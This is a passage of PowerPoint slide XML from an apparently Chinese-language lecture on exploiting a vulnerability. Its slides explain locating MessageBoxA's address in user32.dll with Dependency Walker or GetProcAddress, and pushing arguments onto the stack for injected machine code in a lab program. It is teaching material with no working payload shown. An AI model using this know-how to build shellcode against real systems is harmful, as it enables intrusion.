                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="直接连接符 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2239025E-FF48-41D2-8D92-B37B5C1EF9CC}"/>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6" name="组合 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{076F70D6-5EA2-4739-BE3D-3C68D778EACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2210119" y="4269621"/>
            <a:ext cx="9003889" cy="1938992"/>
            <a:chOff x="5100541" y="2102593"/>
            <a:chExt cx="9003889" cy="1938992"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="六边形 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE1F4C2-199E-4203-9F0F-1D517371BE3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5100541" y="2686890"/>
              <a:ext cx="893382" cy="770394"/>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itchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35D1437-7519-4085-8208-C555A8747066}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6984267" y="2102593"/>
              <a:ext cx="712016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latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>在调用前需要</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0050A3"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>向栈中按从右向左的顺序压入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>个参数。</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>为了让植入的机器代码更加简洁明了，我们在实验准备中构造漏洞程序的时候已经人工加载了</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>user32.dll</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>这个库，所以第一步操作不用在汇编语言中考虑。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="直接连接符 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C98F168A-F24B-4258-A6F1-CC01A9B43E13}"/>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05954867"/>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56D10B41-3824-4948-AFA3-7256B2F988D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4490383" y="837929"/>
            <a:ext cx="3877985" cy="474140"/>
            <a:chOff x="4490383" y="837929"/>
            <a:chExt cx="3877985" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6978420B-79F3-4824-8BD4-CFA1BB7B5C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4989215" y="1312069"/>
              <a:ext cx="2880320"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CBED80BB-7341-4959-B54E-74E2D8E3677B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4490383" y="837929"/>
              <a:ext cx="3877985"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第一步：获取函数入口地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58EC0BB-00B1-4187-AF63-CB46D6082565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424819" y="1456085"/>
            <a:ext cx="10009112" cy="1296145"/>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0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>获取函数入口地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>的入口地址可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>user32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>在系统中加载的基址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>在库中的偏移相加得到。可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>VC6.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>自带的小工具“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Dependency Walker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>获得这些信息，如下图所示。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2AE3077-AAC1-4039-B6C2-90139D5DEA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3044999" y="2896245"/>
            <a:ext cx="6674324" cy="3441880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="矩形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B6581F-5A67-46A8-B9AF-01F8B38F5B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8021654" y="4761876"/>
            <a:ext cx="565343" cy="11306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2DDFC48E-AACA-41E2-AE59-E8722479C807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6890969" y="5892561"/>
            <a:ext cx="565343" cy="1696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A904A1C0-7ABA-41A3-9EFB-4D822D6C5F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9604614" y="4874944"/>
            <a:ext cx="1118385" cy="289967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x 77D507EA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249247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 presetClass="entr" presetSubtype="2" decel="6000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1+#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par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="2000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="2000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="2000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animBg="1"/>
      <p:bldP spid="32" grpId="1" animBg="1"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="1" animBg="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="3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2252911" y="2968253"/>
            <a:ext cx="8784976" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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知识点一：漏洞利用概念</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3174394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56D10B41-3824-4948-AFA3-7256B2F988D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4989215" y="837929"/>
            <a:ext cx="2880320" cy="474140"/>
            <a:chOff x="4989215" y="837929"/>
            <a:chExt cx="2880320" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6978420B-79F3-4824-8BD4-CFA1BB7B5C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4989215" y="1312069"/>
              <a:ext cx="2880320"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CBED80BB-7341-4959-B54E-74E2D8E3677B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105936" y="837929"/>
              <a:ext cx="2646878"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获取函数入口地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58EC0BB-00B1-4187-AF63-CB46D6082565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140753" y="1659633"/>
            <a:ext cx="10473197" cy="1728192"/>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50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>使用代码来获取相关函数地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>：在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>C/C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>语言中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>函数检索指定的动态链接库（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>）中的输出库函数地址。如果函数调用成功，返回值是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>中的输出函数地址。函数原型如下：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FARPROC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>( HMODULE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
